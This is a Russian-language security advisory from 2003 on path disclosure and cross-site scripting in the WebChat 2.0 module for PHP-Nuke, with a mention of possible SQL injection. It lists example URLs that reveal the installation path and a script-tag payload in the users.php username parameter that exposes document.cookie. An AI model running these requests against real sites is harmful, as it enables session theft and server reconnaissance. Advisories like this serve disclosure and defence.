Security Lab

Межсайтовый скриптинг и ракрытие пути в WebChat 2.0 для PHP-Nuke

Дата публикации:06.06.2003
Всего просмотров:1918
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Несколько уязвимостей обнаружено в WebChat 2.0 для PHP-Nuke. Удаленный пользователь может определить инсталляционный путь. Удаленный пользователь может выполнить XSS нападение.

Запрос следующих сценариев раскроет инсталляционный путь удаленному пользователю, пример:

http://[target]/modules/WebChat/out.php
http:/ /[target]/modules.php?op=modload&name=WebChat&file=index
&roomid=Non_Numeric
http://[target]/modules/WebChat/in.php
http://[target]/modules/WebChat/quit.php
http://[tar get]/modules/WebChat/users.php
Удаленный пользователь может сконструировать специально обработанный URL, который, когда будет загружен в браузере целевого пользователя, выполнит произвольный код сценария в контексте WebChat сайта. Пример:
 http://[target]/modules/WebChat/users.php?rid =Non_Numeric&
uid=-1&username=[Any_Word_or_your_code]

http://[target]/modules/WebChat/users.php?rid=Non_Numeric&uid=-
1&username="><script>alert(document.cookie);</scrip t>
Согласно сообщению, эта уязвимость может также использоваться для внедрения произвольных SQL команд, которые будут выполнены на основной базе данных.

Уязвимость обнаружена в WebChat for PHP-Nuke 2.0

Ссылки: Multiple vulnerabilities in SPChat 2.0 for PHP-Nuke & SPChat 0.8.0